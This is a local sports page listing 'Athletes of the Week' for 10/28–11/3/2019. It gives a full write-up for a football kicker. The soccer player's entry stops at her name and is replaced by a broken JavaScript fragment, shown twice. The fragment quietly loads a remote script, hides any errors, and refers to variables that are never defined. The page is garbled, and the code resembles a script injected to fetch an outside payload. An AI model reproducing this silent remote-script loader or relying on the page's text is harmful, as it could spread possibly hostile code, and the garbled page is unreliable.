Athletes of the Week
Kemba Credit Union Athletes of the Week 10/28/2019-11/3/2019
Josh Laine
Senior, Football
Josh was the Firebirds and the games leading scorer totaling 11 points in a 41-13 win over Middletown on Friday. Laine made 5 of 5 extra-point kicks and also made 2 of 2 field-goal attempts with his field goal kicks splitting the uprights from 39 yards and 42 yards out.
Maddy Prohaska
Junior, Soccer
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();